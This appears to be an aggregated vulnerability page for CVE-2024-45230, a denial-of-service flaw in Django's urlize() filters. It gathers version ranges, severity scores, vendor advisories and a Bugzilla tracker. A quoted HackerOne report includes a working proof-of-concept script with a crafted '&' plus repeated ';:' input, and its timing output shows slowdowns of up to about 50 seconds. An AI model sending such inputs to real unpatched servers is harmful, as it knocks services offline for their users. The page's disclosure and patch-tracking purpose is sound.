CVE-2024-45230
Published: 2024-10-08
Priority: P3 · 48 · high · CVSS 3.1 base score 7.5
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS: 25.33% (97.7th percentile)
An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 before 4.2.16. The urlize() and urlizetrunc() template filters are subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | python-django | < python-django 3:4.2.16-1 (forky) | python-django 3:4.2.16-1 (forky) |
| djangoproject | django | — | — |
| djangoproject | django | >= 4.2 < 4.2.16 | 4.2.16 |
| djangoproject | django | >= 4.2.0 < 4.2.16 | 4.2.16 |
| djangoproject | django | >= 5.0 < 5.0.9 | 5.0.9 |
| djangoproject | django | >= 5.0 < 5.0.9 | 5.0.9 |
| djangoproject | django | >= 5.1 < 5.1.1 | 5.1.1 |
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| osv | 7.5 | HIGH | — |
| vendor_debian | 7.5 | HIGH | — |
| vendor_redhat | 7.5 | HIGH | — |
| vendor_ubuntu | 7.5 | HIGH | — |
OSV
CVE-2024-45230: An issue was discovered in Django 5
osv · 2024-10-08 · CVSS 7.5 · HIGH
GHSA
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
ghsa · 2024-10-08 · MEDIUM · CWE-120
OSV
Django vulnerable to denial-of-service attack via the urlize() and urlizetrunc() template filters
osv · 2024-10-08 · MEDIUM
OSV
python-django vulnerabilities
osv · 2024-09-03 · CVSS 7.5 · HIGH
It was discovered that Django incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service. (CVE-2024-45230)
It was discovered that Django incorrectly handled certain email sending failures. A remote attacker could possibly use this issue to enumerate user emails by issuing password reset requests and observing the outcomes. (CVE-2024-45231)
Ubuntu
Django vulnerabilities
vendor_ubuntu · 2024-09-03 · CVSS 7.5 · CVE-2024-45231 [HIGH]
Summary: Several security issues were fixed in Django.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
python-django: Potential denial-of-service vulnerability in django.utils.html.urlize()
vendor_redhat · 2024-09-03 · CVSS 7.5 · HIGH · CWE-400
A flaw was found in Python's Django urlize() and urlizetrunc() functions. Excessive input with a specific sequence of characters may lead to denial of service.
Statement: CVE-2024-45230 is classified as a moderate severity vulnerability because, while it presents a potential denial-of-service (DoS) risk, it does not directly expose the application to data breaches or arbitrary code execution. The vulnerability arises from inefficient handling of very
Debian
CVE-2024-45230: python-django - An issue was discovered in Django 5.1 before 5.1.1, 5.0 before 5.0.9, and 4.2 be...
vendor_debian · 2024 · CVSS 7.5 · HIGH
Scope: local
bookworm: open
bullseye: open
forky: resolved (fixed in 3:4.2.16-1)
sid: resolved (fixed in 3:4.2.16-1)
trixie: resolved (fixed in 3:4.2.16-1)
No detection rules found.
No public exploits indexed.
HackerOne
CVE-2024-45230 - Potential denial-of-service in django.utils.html.urlize() (Another pattern)
hackerone · 2025-02-05 · CVSS 7.5 · HIGH
This one is similar to https://hackerone.com/reports/2795558, but I found the DoS vulnerability by putting an ampersand character beside repeated `;:` characters.
This is the PoC that I used:
```
import django.utils.html
from time import time

print("=== django.utils.html.urlize('&' + ';:' * n) ===")
# Grow the input in steps of 40000 repetitions and time each urlize() call.
for i in range(0, 600000, 40000):
    start = time()
    pattern = ';:'
    PAYLOAD = '&' + pattern * i
    django.utils.html.urlize(PAYLOAD)
    # Print the input length and the elapsed seconds for this step.
    print(len(PAYLOAD), "\t", time() - start)
# Wait for Enter before exiting so the timings stay visible.
input("")
```
```
=== django.utils.html.urlize('&' + ';:' * n) ===
2 0.0
80002 0.8933408260345459
160002 3.4347267150878906
240002 7.70803427696228
320002 14.04338812828064
400002 23.33271551132202
480002 34.01262950897217
560002 50.185
```
Bugzilla
CVE-2024-45230 python-django3: Potential denial-of-service vulnerability in django.utils.html.urlize() [epel-all]
bugzilla · 2024-09-24 · CVSS 7.5 · HIGH
More information about this security flaw is available in the following bug:
https://bugzilla.redhat.com/show_bug.cgi?id=2314485
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Discussion:
There is no issued fix for Django 3.x which is EOL. Please advise if you recommend retiring the package
---
Package `python-django3` is retired on the `epel8` dist-git branch (the `dead.package` marker is present); closing as CANTFIX since there's no live package to update.